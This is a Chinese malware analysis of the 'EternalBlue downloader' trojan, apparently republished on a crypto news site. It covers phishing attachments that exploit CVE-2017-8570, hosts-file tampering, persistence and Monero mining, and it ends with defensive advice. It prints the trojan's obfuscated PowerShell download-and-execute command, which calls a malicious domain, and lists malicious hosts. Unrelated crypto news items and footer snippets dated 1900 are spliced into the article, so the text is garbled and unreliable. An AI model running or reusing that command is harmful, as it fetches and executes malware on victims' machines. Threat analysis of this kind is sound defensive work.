來源:騰訊御見威脅情報中心
編者注:原標題為《“永恒之藍下載器木馬”新增釣魚郵件傳播,附件含CVE-2017-8570漏洞攻擊代碼》
“永恒之藍”下載器木馬在感染用戶機器上運行后,會自動當前用戶的郵箱通訊錄并發送附件為urgent.doc的文檔,該文檔附帶CVE-2017-8570漏洞攻擊代碼。
如果被攻擊用戶收到郵件并不慎打開文檔,就可能觸發漏洞執行Powershell命令下載mail.jsp:
Coinbase準備今日上線Base主網:金色財經報道,加密貨幣交易所Coinbase正準備在美國東部時間周三中午(太平洋時間上午9點)左右上線其Base主網。Base主網是建立在以太坊之上的Layer2區塊鏈。
據加密分析公司Dune稱,即使在正式公開亮相之前,Base主網的應用程序和協議中就已經有1.33億美元的存款被鎖定。“鎖定總價值”或 TVL的數量足以使Base成為第五大Layer2區塊鏈。[2023/8/9 21:33:26]
C:/Windows/System32/cmd.exe/cpowershellIE`x(Ne`w-Obj`ectNet.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)
時尚潮牌AMBUSH與加密錢包開發公司Ledger合作推出數據存儲盒:金色財經報道,據AMBUSH官推宣布,該時尚潮牌已經與加密貨幣錢包開發公司Ledger合作推出了一款數據存儲盒,名為“Liquid Metal Case”,該存儲盒外觀受到水滴啟發,擁有絲滑的銀色設計并在融合Ledger的安全存儲技術,允許用戶存儲數字貨幣和其他敏感數據的同時擁有一個獨特的、時尚的存儲解決方案,但目前尚未公布具體發售時間,但披露會在2023年秋冬季上市。[2023/5/21 15:17:01]
而下載使用的域名ap35nf7.jp實際上并沒有注冊,但是依然能夠解析到地址:t.awcna.com,是因為被感染機器的本地hosts文件被篡改,使得隨機生成的域名映射到木馬使用的惡意地址,細節請參考御見威脅情報中心此前發布的報告:《“永恒之藍下載器”木馬篡改hosts指向隨機域名,再用多個漏洞攻擊內網挖礦》。
CZ:個人實際上并不參與任何上幣工作:5月1日消息,Binance創始人CZ在Twitter Space中發言表示,Binance的上幣過程我本人并不參與,Binance上也有很多我不能理解的項目,上幣第一標準的是用戶數量。我們會看Token經濟學,我們不喜歡流通量很小的Token。從用戶的角度來說,不能保證任何特定的Token都能上架Binance,也沒有保證說一定不上線某個Token。Binance有一個獨立的團隊來對上幣進行評估。[2023/5/1 14:37:30]
本次攻擊過程中,木馬將使用隨機生成的字符加“.cn”或”.jp“或”.kr“后綴作為DGA域名,并在hosts文件中指向域名:
t.tr2q.com,t.awcna.com,t.amynx.com
mail.jsp經過高度混淆,多次解密后可以看到其安裝多個計劃任務下載Powershell腳本執行,并使用了新的計劃任務名:
“Bluetea“藍茶。
“永恒之藍”下載器木馬自出現之后從未停止更新,從最初的PE樣本攻擊到后來轉移為以Powershell無文件攻擊方式躲避查殺,并且通過安裝多個類型的計劃任務進行持久化。在傳播方式上,最初通過供應鏈攻擊積累一批感染機器后,又不斷利用”永恒之藍”漏洞,MSSql爆破,$IPC爆破,RDP爆破等方法進行擴散傳播,近期又增加了DGA域名攻擊和釣魚郵件攻擊,其最終目的只為利用用戶機器挖礦門羅幣獲利。
永恒之藍下載器木馬的歷次版本更新參考下表:
安全建議
1.建議用戶不要輕易打開不明來源的郵件附件,對于郵件附件中的文件要格外謹慎運行,如發現有腳本或其他可執行文件可先使用殺軟件進行掃描;
2.服務器使用安全的密碼策略,特別是IPC$、MSSQL、RDP賬號密碼,切勿使用弱口令,避免遭遇弱密碼爆破攻擊;
3.根據微軟安全公告及時修復Office漏洞CVE-2017-8570,需進行漏洞掃描和修復,或采用WindowsUpdate進行。
IOCs
http//t.awcna.com/mail.jsp
Tags:BASBASECOMbinanceCoinbase Pre-IPO tokenized stock FTXEBASEcom幣多少一枚幣安binance交易所
在一位比特幣所有者失去了價值30萬美元的比特幣后,密碼學專家MikeStay設法在幾個月內恢復了比特幣。在昨天的博客文章中,Stay透露了他是如何實現的.
1900/1/1 0:00:00文:嚯嚯 來源:蜂巢財經 3月27日,新加坡金融監管局正式公布符合《2019年支付服務條例》的企業名單.
1900/1/1 0:00:00來源:52cbdc 編者注:原標題為《智慧金融服務時代,且看各大國有銀行如何布局區塊鏈!》 區塊鏈賦能金融領域,長久以來就被寄予深切厚望,而目前.
1900/1/1 0:00:00在我們眼前開始的經濟危機將使當前的貨幣和金融體系面臨考驗。為了維護當前體系,美聯儲在2020年3月做出了幾項特別決定.
1900/1/1 0:00:00新冠疫情正在全球肆虐,目前除了東亞以外,疫情在各國都仍處于快速擴散狀態,雖然各國政府使盡渾身解數,但沒人知道何時可以控制疫情.
1900/1/1 0:00:00原文:量觀網絡 一、引言 40年以來,中國經濟發展經歷兩大歷史性變革,第一次是20世紀八九十年代,從計劃經濟轉向市場經濟,社會生產力大解放,經濟高速度增長,中國成為世界第二大經濟體.
1900/1/1 0:00:00